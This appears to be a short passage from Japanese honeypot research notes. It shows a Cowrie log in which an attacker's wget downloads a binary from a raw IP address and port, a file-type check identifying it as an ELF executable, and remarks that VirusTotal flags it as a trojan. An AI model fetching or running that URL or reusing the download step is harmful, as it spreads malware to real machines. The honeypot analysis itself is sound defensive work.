http://198.1.188.73:81/ys808e Connecting to 198.1.188.73:81... connected. HTTP request sent, awaiting response... 200 OK Length: 625867 (611K) [text/plain; charset=UTF-8] Saving to: `/root/ys808e' 100%[======================================>] 625,867 93K/s eta 6s 2017-08-03 11:11:36 (93 KB/s) - `/root/ys808e' saved [625867/625867] $ pwd /opt/cowrie/dl $ file 02ab39d5ef83ffd09e3774a67b783bfa345505d3cb86694c5b0f0c94980e5ae8 02ab39d5ef83ffd09e3774a67b783bfa345505d3cb86694c5b0f0c94980e5ae8: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped • 地域に関係なく同様の攻撃を受けている(San Francisco, London, Singapore ) • virustotal (https://www.virustotal.com/ja/)で確認すると取得 されたファイルはトロイの木馬